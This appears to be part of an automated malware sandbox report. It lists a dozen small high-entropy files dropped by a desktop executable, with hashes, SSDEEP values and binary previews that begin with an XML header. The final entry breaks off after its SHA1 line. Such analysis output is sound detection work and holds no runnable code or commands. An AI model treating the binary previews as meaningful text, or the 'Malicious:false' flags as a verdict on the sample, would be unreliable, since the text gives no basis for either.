              Preview:<?xml.....?5.;.SF.m.>.c)Yv{.WX=...).]8..J...-.e...... S`.n...g...)...V.Q>..F....RP..6.X.l...V(......eJ...W...j.S......44LU.}y..V.......c[.........u.....=.n.............Z....`C.(.@..N....@.6.FH.......PU._<...!.5...6.7..J.Y..".*6.+..t..$..B.)u..I.F...FI.K........B.S.c..;...S~0..He...#...|...&p.rK.=}.A+...J.Hz..M...1..v.dx...w.....X-..h.P>@...B....s..>..V...8.Q4......4i.6|#j...K....L....oMV..U...5..].f....v...5...i.Q~..A2..rB.Aw...9\..:.V7u......i.....1.r{.A.\.c....c.p8.~.f.8.3.....K...?.$.C.b.l..J....?......$......|.F.......3......A..r..YH..u.0{.).}...#u.VU.s]&...H.....y..*^....C.l...RlU;.^>.h..z.Ht.6....1. ...D...f..ZA.gF...Q......w.x.X.Z.%:.D.P*Qa=.....C.Q..T_-s.8f]R..A....G..I.N.R.3.K..r[..]".Y../.=...?j^t..A......_@}..<B...=.Y|..k....?.B. ..,....._*T.D.&I_o.../OU^...'.*p.L..9>$e..-.D.9....cJ.J..>v.*}......:../.)..IUz.-....'a+..%.TA.(?.n%..A&6%j.....u;....+..0..L.>.....Z....'-]{.p..s..\.`.d....N.....e......."......m..p.L..F...gj....}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1693
              Entropy (8bit):7.8894975126592835
              Encrypted:false
              SSDEEP:24:espnkqLOMWAv49VjJmS2ltcBe8M/GQKUXaGJkkn+wRpj4HzTuRWkl5l/9UVCxygf:esiqKfBejGWKwkk+yGnuRWUUVCxZMd8D
              MD5:28095846A7A056484604CF6A14DC13E3
              SHA1:4B13B1ED32E7ED24B5B148942302563ED014B235
              SHA-256:83E036B8AA93E37FB0D59290DF18221201FC2261627B430E9D59E9AD0629AE21
              SHA-512:021040C656414C75840655434C5932F324E244CAA52DFD104005A6D5A98AF76B889B627919C9F302A6A56D99C7E2A81A671A4676C7165DE6E7068BCB9C5B4006
              Malicious:false
              Preview:<?xml..rn....".....)I....._.l...+*.Vk..u.{......l...J..^..XV..X...M\F M.P..1.jl..Ek.......9RF.Y8...P.7. .Ca. ......n8.*.f..-.....9..K.......{!dCa.D.j.jW}QC*...n"..9.....p.........A.b...s.jQ.?..2DE.Cc......].A.w.<z.*...Z.M..|....(e...6..tT.....H.S.W..m:...F...3`K.3..n.}wnB.H.R....1..L..Z. ...n...4m....O..x.X..1...d.q.]..).f&..JA......Kz...<.....u"N[..'E^z?..g...f.b..|..L.=.>......S.i].N.x..=2(..#Be....?.P!.=._3<<..J.-l9.+..t....?'. &..-..pL......e.k..*x.r.w.O.I.oa......z....P.d.$..[.(uJ.g.l..o..N.h.b..}.H.....0z]^.w.,.2[2+mP7z.^..P%....`...... ...0.@...l.-k.g.D....?...-\.@:....q....N..gy..."w.,..w'"3S.s.iC..Ik..<E.-"....P...d6./..%........QB..m.....N.Ap.y....\<.....+.{.<N...5....>...".RU.}:.&...]]......\..l..[.P...%.U..@...EN.j...p....:TC..Z.....X.v./g.2..3....!.....V.5"..U"f.y.........g.V.....Cn...v.<.5.}.X..i..].9~tO.O...P74.{.+..%:.b....:.....y.;..U..bN...LX.Fe..x.g.$*n.s..m....$.Q..p.g..9I.t.v(.j...lL6.....Y.v..#.X....8..p.%....X`.e
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1730
              Entropy (8bit):7.866654171800108
              Encrypted:false
              SSDEEP:48:iYqJ92McjvkjpgIvemEtjwEeBy80LqZEv0WOU6Ozb8D:ib9Ok6UEOEeByRpv0WOUHI
              MD5:040D83CD1B801C728C0E87D832CE36A4
              SHA1:E96C6D403ECEAEEDBDE838E7140D1F4CDCA0696D
              SHA-256:F50794DB2CA90CDFB616AA4FC1F37010C198FAC1A6BA349EC61F19A9D1E87817
              SHA-512:D4F6CA169B6D4B44AB6937F48BBDB3A4C10810CFC6C1A23F025D37805B36903984972B2487D4616B6A30358A45DC54BA53FD72B001C45EC8A08753A1DD546010
              Malicious:false
              Preview:<?xml.>?.B+..{...XQ-$t.l.}tN..;..(qNC........x.....sSF./kTc.o..t....+W".Ls..j....f.`.UQc..=9.l...$.1``.e.1i.n..z0...@.+.y..lkRl..........{...!LqtX..|<A..r(...n.x..C:..`|V..F.f.k*..../w.J%83.g..N.$.,A.Zsv.Z......Z.i.......Z.-nIE4....O...}.....l...l....5)(.~...`.m....S=3h....bF.....+........m2../........-Xsz.G.........Oq..r....j...4B~..s.L..4i....a...t....k."........y./R.&:z..gc..a.].'.a.I....p.....&..G._<...H.F.....5h.X>......zA.....A:..b.u...TF&.1...Y.....)..o.\)....oI.i.cS....k...:...Gb;..sq@d..[E$.m(..Q.Y|..$ksk.u..J.g..7...~Q.....~VE......#*h./b..n4J}.Bx.`....wB:D0+2.Zb..$..(s.[*U..fu.n.=.r....P.~<U.-u.."..../,....7..VJ^{..85#..9U.+^3................T..X..*..pw.n.k..~O..{\B......G....#.@......Q...S.q\Y...2.q2.b.FEQ.A..\.....G...R..9y.r#P..i<..%.i......ck...;a'......,....aB./...X.,U.....e.......DxU..}.n?.5..>..J.;..w..}.XI.....V...ZV..._...@.r.)Ss..Ex2...}..b...J-.......qg&..<....b.M...=...x[..Q..y7.@.k9=.w.].... G.fa
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1711
              Entropy (8bit):7.906193682270946
              Encrypted:false
              SSDEEP:48:6k8ITlV6f4DoxDVtANzwFVLz83gkRFu0R8D:6k8I/pwDVtvVLz83gqs0O
              MD5:7488FF5DD361C2DA89680DE00D95BF58
              SHA1:2549CBC8235F844042D266DD173F850F25D92124
              SHA-256:DFA06EC8F94AE7F08E89418E990BD1F3AC3A86F4F10CFDF6888A62549ABD5E2E
              SHA-512:22CE05ED9176054D6D0513BB82171CC91577D31180114967218935E1367C56DFE8DFA09207B81D685A967497FCA94D35D101887FB7D048B2802D7DB36DB177DA
              Malicious:false
              Preview:<?xml..=R...R...T.0f.I4&.-U......m2.{.J.h.XP.._..*..<.......|..R.)`.f.H......v._J..}...4..5,... $..S...%.9N....{.a..._.... ..|.~-.G...~. ..eM....`.~..!{kKD....Ri>....U./.....T.;... .i}16<...d9...G.....\.L(.^..d..+.2........i....T,'....S.+...s."..].d%..L...]_e...j..G..HK..O..Cs];...t.*...9.|....G..;....!Gd......X..y.1......k..Nz=.h,U...@.|.W.:..f..EGQy.1~.Hn..k.#..%D..}.......w#..U...p.....$0....d....9.!6~Df..X.p$fe.P.....**.X.nh.6..rN\Z...... 5.............(#..G...>...7...V-.....y.Y./.k.f...yb..$....9(6.'.Z.<`....n|j..?.?.k..4...k..(.m..G........;`6...,...Aj.i\.:.Q..3.O..u.x....8.....+.....b|..T..LJ....s..q......1=..}i.S......j.^....{.Ns..N...9.....8EEL=G.<...m...}.W...KrV..l#...jm....oE.p.`..u..={..j.-...j..v'.2.?.Z(kl...[zv9a......|i+sdU..z.Sk.g.1.:1..yqYsWA..].C.L..hY...@.c. ..T.P.px(ZY.B....3.P..)..0.N.;[...r.Q.Z.9.P...l`.(u2.]v6a3.m .o.B6T...J....u..bV.I.o.8:m<..C.r.).....GX......~O.."p..........).|...........!..,.iN3..\..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1748
              Entropy (8bit):7.8759112715017965
              Encrypted:false
              SSDEEP:48:g3GLxjL9AKUq3yMsY5uGRvQ+tONCnVBiaxsyabgs8D:gWxgqJPmgnLiaxsrS
              MD5:8980E27D35F318C07B5EE1AB929D8302
              SHA1:34F8DD579B1BFDC8F4C5BBF0F46437D9A38EFF0C
              SHA-256:1E53A93FA6CD071DE11D0767C73DA0BF3B58679B09F7A36661A19EE65338D652
              SHA-512:571561D267A5ED3E45FD28A0E40949EC34E72EB7ADD8E5596337899B70FC139F5604261444D6F65117B43999CFA04D45A27773A78D62FCD72E73860B8DC1C1B2
              Malicious:false
              Preview:<?xml..z4.............3.....mv.`H9..(J..z!.SK..:N.....A@....(..`T..<.+]@......JBed...oH......?".MXx,...'...aN.....-.MG...H...CuF.(.#W......lx...Le,.!g..##.T..i.se.lC......,...zLx.q%....b....F..__._.{.../...=7....^....\...`.`w.x.....w......J.xqz5R....a......s.vV~.'.)..#o..E?.T.........3.{*-..y....."...P.r..;.{{@:..(..AJA4V.I..g.....x....7....}Kt%.Dj%.W..uI.....0...=.....6.K3...<..6...X.i8-dd.^..<.>y.F........=...y.".lQ.>%-w.....N". ....C....RM{..o.A.:.5..n...N?..q..18./IM....nT......x.P.jY..Y.x.Q.........<...O.Y....]]...8....).K.u..4.f.q..(..*.`r.....2.mK....b....q....>PLIO........Qh.<..O_..;9...0.a...S.........e...>f..a...>T.,u}._.s.{.@.0.!..}.....j..ZQ......./...|.m...sMB.=..8.......0>. .....*f....=eu.I-....t.b.M.NB. y^N.("Kw....6H.....c.8"D..#.....W..{!..D....y)b...P.^F..8.....)..4,..v?f....fUI.+ba.y..57.\..U.O..0.`+J..w._i1..'.LB.9`w....`...A.@4..4g..%qy......y%a~.S...fl.....6.."R".\.....\...7I....;M...9.....1PD..u..:.q80.0XC.e....lw......p.|........u.5
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1711
              Entropy (8bit):7.890796148294841
              Encrypted:false
              SSDEEP:48:J/8JYtEYnkIMTEKva2MwxD/v+0zYSCEgnVCjV8D:JuYtVMTR9zFYSCLnVCja
              MD5:1DB84A324488AD084A33046356DAB61A
              SHA1:C32363984785D211BAD9B6169CE4C74A3420246E
              SHA-256:2864D618969FD607BC900B90C7A760F09197962B61922248F2C3292718EC705F
              SHA-512:63B4D4F9FE2DDA9C9B937FA54EA9CF55D64FD476703C669FA12259CE6F4C2176B06AEB941F2AFCB8AC3D0AE2B989FC51B52B0C49761C6D28123A022B08454638
              Malicious:false
              Preview:<?xml.7.eWY.@...xu.&....(.\n......Y_{..4.[j....)....1yz...........92W.x.sD.I. v..h..AP.+...Gg.i..+4ly.yg...4. .....-..1.h......r....!....x.....D.RkL........0...lL$...2.U...f...i..H6...N...M"../..H>)x..&[..$V-.Q....s....Hv&..Hy.v...{.....L.^{..*.W._....d...80.K>..3&8.....v.ajYu.........Q..?...b4.i53.D.s....gW.z........F..eHM/....o...It.' .[.....e&..J.....p...b...K..b(K(.vz...}...\.k[.x...s...........bn....X....oT#.?SRhX.....M30...;........s....X.....w...><./..z...>_.a...]-|.p..q.....J..0;.Q....i......L.......]g]I..5%j...3....k.G?^....?.J..P..;..E.-.^.m/X.........o....l9...0c.*i...sC.Y.a.`.V...w.cB.QQ..].D...X.f.2.mw.1.:...2<.U....1..FE...h..]n..i.....N..Y...mz;..X.T...5.h.0kKN.`.....\....o.....:....(bt.:j"d...c........n...1Y.i.j.:...&...h....R..../c..<b.P..#.......:;+B..+...g...n.H..b2.B..E&R(..a..-..A..or...j.;O...K..[,._...l...........J..8Y.F...'......|Q..|..Y.`.v....r..r..8x.....$S.z..N....F1.`r....=w.H..........S{.$.......h.<{WV.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1748
              Entropy (8bit):7.8874187512534215
              Encrypted:false
              SSDEEP:48:/0tOhTtIst7LZh0iQU2TtiOtoxXXqri1TRBNBsAj98D:/LIst7LZh0JU2Zv9+LnB7S
              MD5:666A88F17846E7E7FA05C4078AD2E764
              SHA1:EA2055B6D73F412ADB10BA93E0AD7BBC7FBDC825
              SHA-256:4FEF9A358A61490F12FFEE15F973DEC2C820407D8178E3E45F40AD8B04379E86
              SHA-512:6D3AFA465583EAC4596310F110587A99F69B6FDCD305949044306B9B038E5630ABF3329465AAB7AAFD19A5FCDA6A82B3A091BDC6EAE1EA44B1514E258649B3A2
              Malicious:false
              Preview:<?xmlf......s_2.L .Xio.&...B`....8!3W.g.+......1.uxkH......!z.W..}.Vt...q.N...l8..7.d.w)N..FV.T...b.=.XbPi-"..`...12.+.Rg..-..v.%...6.....&.K7R...R..&.o.....(.1..(...2~.....h..=pu..U4uN.=....a.G.W.........;.....K>.P4..7OhA...@qX+..f..v7.#.e.....-..:...'.v.....#+@..&..A.'....y...<A.[./.7.(MA...][...[am.LG...b.Z...FIqE...T.%O...9.&.{...?..X....0.R]Fp..r...Rl..l........_}.........}$.)....m.llK..1/%.....]^z....E.(.=......'./`/....V.PM.... ..'.;Z.|......T6..(3.o|...I.c..4.j@....r.....R...p.M.7..Fr....x......[c|n.%...+t..u..m\........L.(57.e......{.........P.....*....<p..QLmJ....M....Q8...JR.......C?...v..zlfba..~..../.W..X.......m.......n..~....._....h....dc..!..B....c..V....b.&.#.....^.m*G.H..$p.R..m.m....*T1....f.?\-.@.^#..W.bO.:'.o..j..k......&....(..U.".Eh[.7q......h..q..D.......ry.k..d%..{..q.U..d.O....:..O0..S.......J.]K..j{?.j..F%.....;..D.aH..Os`..D.`......?5.8......]..._"....!..^ ....r[.......\.g..Qh..{.7JI^...%.%..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1705
              Entropy (8bit):7.887409928437513
              Encrypted:false
              SSDEEP:24:tMyEhpxWRnzWRZK4jdZztFaDoCZug/Hjrut+Zq9AY3Ia4O7MMLE1Yu0Os80d+bD:tZvxWXzCZHjqkVa51SXq8D
              MD5:862E998D5949DC9956A4EA5F5E133203
              SHA1:4FFA5FF0A3F8E511D4425DE5F9893A6F864C04D9
              SHA-256:BF8CD752A718F9393292CAE53C2A8E7446812314CA53C6CC17B179DA42CDB4AE
              SHA-512:F5C045858353FD8FF9B508BD4E2C554B2D0FE2FF648D0D579A8CBFBB77D0A352BE7B604E13E6CC5D85407772E6A713911EBDA017E79E0FB6696DBD9B18C3E30B
              Malicious:false
              Preview:<?xmlh!......."j:...HV&i..2...f..<t.k.&.,.......G.2.66.}..MVou....b..@*o..+...PUK....w.Ju..9. m..PHE<.57t#65.3!..+.....bs.Q.6........?q....Xr|...;.o.f3*....^.oa..r.Z.RQ>(....&...=D..-|.f..`..P..........]...........nu.r....`p...fr.9{.L..H\.. .Ol@w0.M.!.5^:X..:. N}...p6.HW.`e...P.#.(.?3.|.p..(...^...<*d.S}.f....F.x.....`_..`....c..JC2..ec...qp%p...Z...a._0.#...z..&...y..P.0...^zg..x9......"..>h......>...Pf........]\..Q.'..#..7c.....\.j..5XJ.6......!.Mx.'.=..~..[-.El'R@.C.X-..%|rp...'.....V9&h..IC..c&.....C.haD.....&.I.16.9._.&....H...A..}..S..e...F.=aCgp.......0.....".*f..1M.f2.T~.+M.2L.ytq..d.+.E...+..g.l.Y;o.%...H,....5.....y..l.& ...........&...F.<.6".....t....O.:..`Dx......+...~..YR..r..<....a?..M.........q.RO.hU.O..jj.0...@A...T'.I....'...=....Yb./.%K..%.....w?.x.M....d..]..=T..k.../.#.>.k..~..}/..wJ..4|.."j@....q.W..."...:*X:b.:A..:.."...........gD.s..^.".EL....c....TNO.w.<8~.b..n.RBe.:...\.....]$...&'...9...-.k..}..4R.]....X)....*_....v.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1742
              Entropy (8bit):7.8960284817152235
              Encrypted:false
              SSDEEP:48:Xmu5JymzqxdaOoU+9dcIEp19C3zW9KoUNemLS8D:D5DqHjz5yWAoaemLj
              MD5:96E3004834DE4CA87534ADAA32E13A78
              SHA1:98B128F7076C2BD692DD56D1E05BE366AFBDB6D7
              SHA-256:9C1DAEBED46EF43FD549DD0D6AF2F81F74B1D9C5DF5F7F091075764CD559A4FE
              SHA-512:3FA0195D028D5763D146DECD4A0C62CA20B6457C6B804D2492712D365F6788045490D9575864355C95322AFDD818B26283B78E139633BE76005161BF8866F5A1
              Malicious:false
              Preview:<?xml.".).fW@....0\......G....g.N....x6.S....P.sM....u.j.s....L..M.=+.3.%.=.I<..m;..hh.1..T.T..U..<.Tf...+.c!./v..Y.Q........~.E.".sxt..W}_;1m....fL.wM+..j.....8.k.6..T.P...+..<..pi....4.........@:2..'....%.......$......6.7.E.X.-.Yf..:...l..<_1.7Y..eF8...g.}...2.q^...TT.t..l...-.....%....P..V._..*...`...D.....:%.G.....0......G\%..)1Ai..(..K..x..R#.N....Ya.@.&......-\-.Foe......Xp...........m.z..7+Y..Pl.`w...{;........m.E..r..1.[..$-Nu(7..?...(E..s..KNAa...A.b..[+<F.!../..c......$.m....`..%6d...%....../[.^l.2..OM.Z.1..f9..S.T[4|.....sLJ..+...p..6.?..........\i.g..},.HP.bT..(....}.,...%..Y.eQe.......8[.*..wY>vdD.y....T.$.Q...^..9.......\.9p...\..H.O#.5.w..u.b. ..........*\..x$.Hh7...R.y....*a5Tr..7.......r e.W.=..L..V'..z..[.K.....-..=4.....(.B.g J.."...q.:]...=#..0w..0Q.....!.3G.Z...?*fY.O.R......#.PD.q......p....]2PM..p...<<j.....6[2{l....$ef.../Nu..B.U.M..4..............x....a.M.m..:.H...3.S.Ca.uG....@.!....wOR.i...j:...b.#..9M..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1691
              Entropy (8bit):7.880332020919606
              Encrypted:false
              SSDEEP:48:yi9ljIN31GG8D77v98/axCC2Mj0FWlmnnL0vD8D:yiC38D77v98/guFWbvc
              MD5:D7ACF9F2B55E8EB7E47C930FDC795E35
              SHA1:647F145CBFE9A3311B8E87309E3A1BF7384AFD79
              SHA-256:2630111913C6884BE6A2E805BD4D0F55B6AF02C78053DF6737D35435ED5EFA3B
              SHA-512:19F96D6B263B7B7B6FA7546A8A37E2F155DB96ACA7966FBF8B5A6E277AB071BA76F01C0DE9995C98454D6D378F9439866CB477943F52083EDFF3B19324AD221F
              Malicious:false
              Preview:<?xml..s<..4p..&..o..]=.$.Qt..fw...).C.o(f.^.-.-S.#.fJ.k..:U.}.W..p......4.|...A........A..b.M...9J...$.MuX....f5K.~+...hP...*.z..}...?1.'-...]...~..~......... ......u.2C..c.7.........0LC.D....i.T..|.2sz3.8..C.......z&....?v..D....CoZ..z...C.8.........;.5..br...../..R...IL.0.~.js.J..E...p..g..P.a.D...;C.l.6...g..n.o.7..?8..1}....b6.szq...M.n....e..X.Wj......n.3'..D.... ...|c.xt47!...*u...Fn H....R$.m.k...Y..!%...W.".c...UE>.....F.......l"a...........2&..m..-]H....p.p.@....0...!.4......P'0....#.^:.6.=..Z|..s.V...w.!...7W..b*.A.:mz?(vy.O...H....-4.)....f..>&.XL..l.F|.s......{....@..%E`{R...T..pIP..T|/<h.r......S.T.y2.SL...'...C..X.....z......I..C.-e........9O.I..8&.<.*....e..4B._.B<?......~p......aq81..~P..1.>E....*.G.C.f1...].../....2.U .N.....hNN.1a....H.....O.[....s..b^..F.7.'?.....[%.v;.......V.(U....v..^.....>..jj..D..$Aq.kC...G....?.;.L.Q.9}`j..u.@...w<..........t.Y<za....\Zk..7EyC,...a.${..BJ.e..h...k...@{....9.r`..8..\...{ ..........n.)g.qE.\.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1728
              Entropy (8bit):7.892437733409761
              Encrypted:false
              SSDEEP:48:vui5NMWYObd/uR0DfKsNhGLTPG0pjWdJW+YOml2GV8D:vuivTKIwjXWDWfOmwJ
              MD5:58DEE5348A418933135E0C34049FE8EC
              SHA1:8251068621A9C9FAB91F4A1F5E2422D17CF1CE73
              SHA-256:B6F7240E6CCDFA6E2DAF4F0034BD84676698FBB58A83F0617A88689E7C18FFEC
              SHA-512:E00B2361E0D53E8E69670545A56A57478ADC5329F3E4256BA471C11A524C59329DE6C2AE8AB54DEA8E131401B8EF3C3A0F57A979E65E9A914768C0F116814939
              Malicious:false
              Preview:<?xmlKT%.c.^:....:...%.-.hL.d7./....Ny.F$".........|.l?.1.K.........Qy......;u.t...%.>..rT.....|W/.z.:..=U^...[....L.1.q{...y..3..k....f..t.U..;.y>?..2~.md...t8..<.......M...Hs<..i.d....&-F.@.&K.A..I..KW.TX............}..t...[f...N...MYx..}..$2..,..l:`.......{*....#.bT........R.0....o..._js.U.%.....H...0......-}.*...y..dk..a.%..5_..s.iy.....l..*..%.rB.J1(..5).....e.$nv...].O....hoT.E.....}E....x....`@....p....:.A.n...3...X.c.."k..=..?d.E.y..6b'"..........pz..+Jff.}...{..2wRW.....d.o..h.....].z.De.........._"C.....-H..u..<.)........./.&2}!..hlY..3fLs....s#...b*....Z....>..x..E.E.R..O_..F...+To.....+g..G.....;C...-....YNF;.)..U7u.&.3.m.. ...j.>..!...}/R+>.D\...u..@.%.t.os.g..bcR.Sr.P...@...[....Xj.j.;.8_.......B.H.........c.....T..yJ...+.X.zRu..\...xY.E........;....@.1.[.3..oH..._..9.UZ.j?.\....X3..B5..C..h...s...nRKq3......92.n%..D....Q...1...*Mmd.:.D.w.O2...qf.2w(....& \..v<0Q.Sa.S._b...>..".7....y\W'Ps.^..F.z.p..a.c3m.~..F..,...|.r.y.h.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1700
              Entropy (8bit):7.894535426405265
              Encrypted:false
              SSDEEP:48:VLXatPl3GYHojEwMJIQJyQt5AzTQoUR0AehqRs/c2ww5bO8D:V+X3vojEsQJP5AzTkHeQRs0MZ
              MD5:14B04E9AF93505E5D690C9AA1BC995EB
              SHA1:EC931A84188B7E7FF958788E174711CF483A6D23
              SHA-256:E2EB0FA3E8829A4DBD6E36958F8DC13E7C252FC87D63042A44A8981A55EBBCE0
              SHA-512:3D0BC97EF6F46DECCA9868A3BFF8965A050D824E644CB0D34F5199ABB7B08E8D838C7A2987132BA39FB0E22A34720BE6E8A40FECD4A842AE556F63833E789BC7
              Malicious:false
              Preview:<?xml...?......<.jm.u...O.WZ$.aB......7....$e.....w8...4:...}|C%d4..7.(.HP...NV..ILM...z...J.qg.Y.}....`....&r6....F)8.*.~.:.S..>.g. .R..Zj..~..s..2.~s+..^...Ro....0f;..UG`....@....t._6....4..l.`.[Ql.~..f.b..?..H...;|....,P.f$.Y....D.o.+.o.jt..~x,..O{...+..!..;..{.|..LX..).i.....#....R..bn.CN..F.].!.....a=j.....a...c[E..s....P.......JI...^X.i)..\.".v.3....F.a..[.2..f.7...7a....A.#..W.e..2...9.l....H....|..?\.3.?..@.}&.....E....8.:.?y.X....@[.S8&...!.i..._._....p0.*:o,..............".....I..c"(..E. \..`vf..>...&..y.x..o..=.lz...0..@..7.1.....+....<.;.o....O@.......O................l.......&.....%...@...y.~.t.@s.{{.~..H.D.K.y..<Qwc.H.f.j.k.....x....A.dS....i_..'....G8.I.....a.h.?)....;w-.9?.....^..\'5Mt3...b../..V.W..$U...xy.....>.......*+R.W9....{5..G...7.f...6.u8....V..l.5..N.`..r1.<.rL.....9....z..d..\I....s.hP.'.w.I......n7gZc.,.X.K....V.*..$u...47.fmn...o$...S...\w...xRw.EJ...a..?...8..Y ..*.).".=.Ph2g.b_........1T~..s.H.g....8..].^..:3....z..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1737
              Entropy (8bit):7.872323971669073
              Encrypted:false
              SSDEEP:48:CmbnDZxl1CDTR3xQF84VWoolSROVXO5R0n8D:Cmbnd3kTR3LFOn04
              MD5:3A24A47588C82082487213E4890DB0BD
              SHA1:F7B4A939D097777202E1DC04A1AB4CC2A5A5731B
              SHA-256:D8F47F5E565BFECDA6D14323754CEE93B7029845ACE77479A9D62E0AAFB75AA0
              SHA-512:4928C129B95E057F60CFC90511C23C408C828DE20690F4770789B4C20144E0A18AAF40F08DE958D2CB14164836A55E110CD772F778A232B98E7FCBA4980DA846
              Malicious:false
              Preview:<?xml*...i#..f....Q.!..^...sT.o:C.z..*c.e...]T.b..p.....\..l...|.Q..#..o.\..29..!7..k;..U7..x.e..}.@,=...8g.I.F".d..0.Q.06A...2.....`...m.....[1.5X4X......!m[...5.Q.).p...&'_.%.`k...14.....'..Zi.._.Et{..;...,j..w...rK4.8W....5..'.....V ..0X..w-.../..].fi......#d..p..<..w.Y.<<..w...4y.&E..?w.1j...b.~...`....d.K....Q.`..t.wh...5`.6....Zxo....O.<..PWF.........;.,......3...M...'..YM.T..y.>^..,`.......O..<..q.P.1y..L<j.0.i.u v..M.C|..gv&.7?pQ..8../.s.U..l.K)9.v....&B../H.i~..B...Aj.=y.A... $...wOL....vxd{R......BR..3....."...A...6s..M..Q.r\....;97...R(U.^.oM.b-..+;>n...J..keL0..........1.u..v...."^...V6k[O...b..7.4....\...[j.A.0J|..C.z......./...I...'g.6..1?3..L.~.{......+...$T...R..=.c6q.5i..&......[u.>..u.&..b.X..j..3{..z...ny+K..B..dt._.-.....!l....N...Uh...tem...+c1B..6.dS.........hM<;.../N=..<...}w.;..J...=6u.....K.~F4.c.c.0qV..L..P8/.N....z.JFs[L~.R....."..-..........v..:..>,...Tn.4..):.|"..cv=u{.c.....1..V>.[.O<[c..z...=.{ec.#..c.Y..~.....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1699
              Entropy (8bit):7.872055825705262
              Encrypted:false
              SSDEEP:48:TO1Xl4mzyU7JsEycNp3wxSEWcyHUzPtZxcrIU8D:TmllDJsEPwxSE1oUJ/rJ
              MD5:DAADA1672E972D712251AFB92F21E884
              SHA1:E1CA682773A423D142A72DE75800225AC690F4ED
              SHA-256:609ACCA1FB9B5B270EF0B364EF44F6CF7879E1321C038BBD0961E7405393A2F1
              SHA-512:2C1AF40F6746416D8AB5C972F351AF4924C9BFD3C1463146E59D82BE4983D955E9A54BC375433E07B9EC88496426EBFB8DACCAE57273FBDA1B2344ADAE2598C5
              Malicious:false
              Preview:<?xmlh..P..,..{.dYh.&.1.)'.|R+.pfQex...'C.M...=!#;..A.......o....Q.....I.Va.5w...(_.n.:.(-.l.......2.../.Y.t.OK.....Wp..F+s?g.$....(.h3.w.KmNJ..7..Z.t.[R.4.RQ..V3Y....).~......F...>}.UWW.EX2SS.Q7.g....%TT.. ..W8T'.V7U.0..|.7>.y./....-.R{.4cTn.J2...k.W...gd........-i.n.yD.M=../.puox.9...{...1.(8\d.88w.V.. ...,.?...A.>..SR.f.`..OnXj].....H..lvJ_....E.'....,.Q..`.0...E.R-=*_...\.;$..S++......&'..t..JZ...H.dv*......SY...r..U8.o0...fi>..-LS.&>.;.`v..+..3..4.f.&.<.B...e......0.B......uh).d,....p1...q./.=.u)N.f.qPO.....{)~..?. ......zx.M.....g...~.....Q...6(,./8....~...~...r...~...U.q._p.v..,.A.......a...T...p..]V.\..J.h....,8K-_P.x;.H.7J^....k.....8Cfc..V.H.....q'E.t.T#..=m...h...$-.;.OaQV...2...^.U....;.b.-.....u.E....r.......$..a..[zUFNu..A.e...7./o...x).rl~r.p..P.NK.K.].........`...V<..$..'...w._N..P.eF......=.....L]!.t=F...:..j.Z3s..}.^GGA..................Mb...@.fJ.9>..j.m!.*......R..S.kF.TI...._.jd....B..P....3i..tnG....@..:..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1736
              Entropy (8bit):7.891733473164719
              Encrypted:false
              SSDEEP:48:gd6epqQnvtYIZQFPO2XoKe2gLrumTHtVwK83M5IrhRD8D:Q6ejeLO792gLSQYK83GIjc
              MD5:649F17C1A9CFE46B1288E64705AAB73E
              SHA1:07138209B10E394E6F696CD03BBC691D2EBECA7A
              SHA-256:0A9D8DB14DC6CC22FF197D4BE75DDD83EF419FE63DDDCC983DFCCC2C7E3E4B1E
              SHA-512:06BC597C5DDF25698E5AEB58CB2EC445DACC6EADEBA3452A051132AC9DE06A1B681D8FA64EABB6DCA5AFF15B3ECB8894C85FB036B67C2A13C4CBAB465BB94088
              Malicious:false
              Preview:<?xml]...H...!N.H&/&.V.i.....{....t.]=}.h.....)..\|....~....Ik.5a....3N+.R. J.....7.L..#..p^.._....++.^.........I..V.0m8.h..[....C.g).....2.!D...B.+)l..J.@e.*.B.'l~3p=.VpsP......R.oq^..:..C.3..)I..p.b.[.e......./.y.)\CZ1..xr.lf....m.......s...w..}.....'_.j>@2..*.)cBjU..5..I.!...it."...lc5..E.H.k..pA.M..(...+.c*.0...d<Bn1...x...K.#........!..S."..&..vW4'.D......n.?..............9.....;1..]..0..Jt..y....Q..}...X.k...G..Rmf.....L..I@_Nu.y....9...........?.3..(..yN"..m....r......Z,I4.....6.5...w.A.w-Sv+.j. ......Oc..D...$.z...?"A...S[..?.\.<V./....S...DxR.=...?ju...9....a.....K.R..'....cgd..CU...U...'*X...:Z....5..i`i.Le.y..n.).W..la...ha..x.I..6.0u.i..*.K...?2...6-D....u..crSc0...m.SO.....w....{........j1aR.NL.P.a.\..FN.u.G9.j.|?.h;...,..E.....,.L....R...R..H....O..'.z.F..>.x.M.......%Q=.o...#......7.w..DW..vv.&..1.+.j...m.E.l.*.....j..CG. <...s2]....r]2.P..e5'....X......*.q."...y......h>.1.0D..#r.r......$.P._B.I.._ ^.........d.s
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1687
              Entropy (8bit):7.869263562417745
              Encrypted:false
              SSDEEP:48:KXihxNP3Z/efd0e+7tJatn3SsKgkEx1DzwUWZOs8D:KyRfdefdSRUSCkeWG
              MD5:5022E2F9903B1CA03B3A6ECC42B551AE
              SHA1:D110C70F5E0B67E78633C4D5EAA22737BE2AAD7E
